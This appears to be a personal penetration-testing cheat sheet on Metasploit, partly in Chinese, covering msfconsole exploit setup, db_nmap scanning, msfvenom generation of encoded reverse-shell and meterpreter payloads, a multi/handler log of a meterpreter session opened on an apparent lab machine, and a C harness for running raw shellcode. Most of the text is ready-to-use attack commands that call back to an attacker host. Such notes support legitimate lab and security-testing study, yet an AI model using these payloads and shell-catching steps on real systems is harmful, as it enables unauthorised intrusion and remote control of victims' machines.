Misc Tools Tools-Metasploit

February 23, 2021 at 12:46 AM Edit on GitHub

Metasploit

Table of Contents

tags: Security Tools

Reference

Using exploits

Msfconsole

msf> search snmp
msf> use exploit/.../.../...
msf> info
msf> show options
msf> set RHOST 192.168...
msf> set LHOST 192.168...
msf> set LPORT ...
msf> set PAYLOAD windows/...
msf> exploit

  • set global parameter msf> setg RHOSTS 192.168...

  • database services

msf> hosts
msf> db_nmap 192.168.31.200-254 --top-ports 20
msf> services -p 443 # print all machine open 443 port

modules

  • Auxiliary

msf > show auxiliary

  • Exploits

MSFVenom

cheatsheet

msfvenom --list payloads | grep linux | grep x64    // search payloads
msfvenom -p linux/x64/exec --list-options           // list options
// generate full interactive reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=7702 -f elf -o msf.bin

overview

msfvenom -p windows/shell_reverse_tcp  \
LHOST=192.168.30.5                     \
LPORT=443                              \
-f c                                   \
-a x86                                 \
--platform windows                     \
-b "\x00\x0a\x0d"                      \
-e x86/shikata_ga_nai                  \
EXITFUNC=thread

注意這個生成的 shellcode 會需要用到 stack 自我解壓縮 ,如果 shellcode 放在 stack 中(ESP指向位置),要記得在最前頭塞 nop

EXITFUNC

  • thread: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)
  • process: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.
  • seh: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.

shellcode note msfvenom command cheat sheet

Useful Payload

  • use windows/meterpreter/reverse_https
  • use windows/meterpreter/reverse_tcp_allports

Payload staged/non-staged

msfvenom -p <payload> -f <format> LHOST= LPORT= -e <encoder> -b <bad-chars>
# -e x86\shikata_ga_nai
msfvenom –list payload
  • staged payload Metasploit exploit/multi/handler windows/shell/reverse_tcp
  • non-staged payload nc -nvlp [port] windows/shell_reverse_tcp (sent in its entirety in one go)
windows/shell/reverse_tcp - Connect back to attacker, Spawn cmd shell (staged)
windows/shell_reverse_tcp - Connect back to attacker and spawn a command shell

example: using staged payload

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.12
lhost => 10.10.14.12
msf6 exploit(multi/handler) > set lport 7702
lport => 7702
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=7702 -f elf -o msf.bin
// generate upload & execute

[*] Started reverse TCP handler on 10.10.14.12:7702 
[*] Sending stage (3008420 bytes) to 10.10.10.61
[*] Meterpreter session 1 opened (10.10.14.12:7702 -> 10.10.10.61:46986) at 2020-11-14 21:02:55 +0800

meterpreter > ls

test payload

format 選 -f c

#include <stdio.h>

unsigned char buf[] = ""

int main()
{
    void (*f)() = (void (*)()) buf;
    f();
    return 0;
}

編譯

gcc -m32 -z execstack

Meterpreter

Online Resources

Commands

execute

meterpreter > execute -f bash -i
-f <opt>  The executable command to run.
-i        Interact with the process after creating it.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).